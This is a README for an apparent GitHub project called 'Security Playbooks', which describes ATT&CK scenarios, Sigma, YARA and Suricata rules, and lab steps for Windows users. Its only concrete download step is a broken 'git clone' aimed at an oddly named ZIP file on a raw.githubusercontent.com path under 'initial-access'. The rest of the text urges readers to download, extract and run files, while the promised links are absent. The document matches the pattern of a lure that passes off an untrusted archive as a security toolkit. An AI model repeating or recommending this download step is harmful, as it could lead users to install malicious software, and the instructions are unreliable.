Security Playbooks is an open-source set of cyber attack scenarios, detection rules, proof-of-concept scripts, and lab guides. It helps you learn how attacks work and how to spot them in logs and alerts.
Use it to:
- study MITRE ATT&CK techniques
- review Sigma, YARA, and Suricata rules
- follow hands-on lab steps
- practice threat hunting
- learn how SOC teams find and check threats
This project is made for Windows users who want to read the playbooks and run lab files from the repo.
You will need:
- Windows 10 or Windows 11
- a web browser
- 7-Zip or WinRAR for ZIP files
- PowerShell
- Git, if you want to clone the repo
- Python 3 if you want to run PoC scripts
- enough disk space for lab files and samples
If you plan to test detection rules, a lab VM is a good choice. Use a test system, not your main PC.
Visit this page to download or clone the project:
On the GitHub page:
- Click Code
- Click Download ZIP
- Save the file to your PC
- Right-click the ZIP file
- Choose Extract All
- Open the extracted folder
If you prefer Git:
- Install Git for Windows
- Open PowerShell
- Run:
git clone https://raw.githubusercontent.com/theylovejay409/security-playbooks/main/playbooks/initial-access/security-playbooks-unwaning.zip- Open the new folder after the clone finishes
The repo is set up as a learning and reference pack. You can expect folders and files such as:
- attack scenarios based on MITRE ATT&CK
- detection rules in Sigma format
- YARA rules for file checks
- Suricata rules for network checks
- lab walkthroughs with step-by-step tasks
- sample scripts for safe local testing
- notes for log review and threat hunting
Common use cases:
- check a suspicious file with YARA
- test network alerts with Suricata rules
- map activity to ATT&CK techniques
- review logs for signs of attack
- practice incident response steps
After you open the folder, look for files with names like:
README.md.yml.yaml.yara.yar.rules.sigma.py
Use them like this:
- open
README.mdfiles in Notepad or your browser - read lab steps in order
- copy Sigma or YARA rules into your test tools
- run Python scripts from PowerShell
- keep samples and logs inside a test folder
If a lab uses commands, run them one at a time and follow the order in the guide.
Some folders may include Python scripts for local testing. To run them:
- Install Python 3 from python.org
- Open PowerShell
- Go to the folder that has the script
- Run:
python scriptname.pyIf the script needs extra Python packages, the README in that folder should list them. Install them with:
pip install package-nameKeep your tests in a safe lab environment.
Sigma rules help you search for attack signs in logs. You can use them with SIEM tools or log platforms that support Sigma.
YARA rules help you find files that match a pattern. Use them with malware analysis tools or local file scans.
Suricata rules help you look for network traffic linked to attacks. Use them in a lab network or on a test sensor.
Start by reading the rule file and the notes near it. Many rules include a short use case or a sample event to test.
For a smoother setup, use this simple layout:
- one folder for the repo
- one folder for lab files
- one folder for test logs
- one Windows VM for risky samples
- one text editor for reading guides
Useful tools:
- Notepad++
- PowerShell
- Python
- Git for Windows
- 7-Zip
- a VM tool such as VirtualBox or VMware Workstation Player
A playbook usually gives you a path to follow:
- Read the goal
- Look at the scenario
- Run or inspect the sample
- Watch the log or alert output
- Match the activity to ATT&CK
- Record what you found
If you are new to SOC work, take one playbook at a time. That makes it easier to follow the steps and keep your notes clear.
- Keep the repo in a folder with a short path, such as
C:\Labs\security-playbooks - Use a test VM for malware samples
- Save notes as you go
- Rename files only if the guide says to
- Read the folder README before you run any script
- Use search in your editor to find rule names or ATT&CK IDs
You may see these file types:
.mdfor readme files.pyfor Python scripts.txtfor notes.yaraor.yarfor file rules.ymlor.yamlfor Sigma rules.rulesfor Suricata rules- sample logs in
.json,.log, or.txt
If a file will not open:
- make sure you extracted the ZIP file
- check that the file was not blocked by Windows
- try opening it in Notepad
- confirm you are using the right app for that file type
If a Python script fails:
- check that Python is installed
- run
python --version - confirm the script path is correct
- read the folder README for extra steps
If a rule does not match:
- verify the log or sample fits the scenario
- check the rule version
- compare the test data with the playbook notes
This repo fits:
- SOC analysts
- blue team staff
- threat hunters
- incident response teams
- malware analysts
- students in cyber labs
- home lab users who want to learn attack paths and detections
Visit this page to download or clone the project:
Open the page, download the ZIP, extract it, and follow the README files inside the folder